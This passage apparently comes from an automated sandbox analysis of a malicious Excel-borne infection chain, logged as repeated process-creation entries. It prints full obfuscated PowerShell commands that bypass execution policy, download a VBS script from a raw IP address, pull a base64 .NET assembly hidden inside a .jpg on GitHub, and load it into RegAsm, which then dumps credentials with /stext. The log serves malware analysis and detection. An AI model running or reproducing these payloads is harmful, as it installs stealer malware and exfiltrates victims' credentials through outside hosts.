[System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8131.tmp" "c:\Users\user\AppData\Local\Temp\lrugk233\CSC866FCE414411468EBBBEC22B5654CE3.TMP"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jurvurlefvnzyimponaoqrckug"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\toxfvjwftdfeaoitxynhtwpbdvhxj"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXeJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EB6.tmp" "c:\Users\user\AppData\Local\Temp\sknmngfy\CSCD0FFB283197417ABFDFF0C5A9D2FBA3.TMP"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jurvurlefvnzyimponaoqrckug"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\toxfvjwftdfeaoitxynhtwpbdvhxj"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8131.tmp" "c:\Users\user\AppData\Local\Temp\lrugk233\CSC866FCE414411468EBBBEC22B5654CE3.TMP"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTG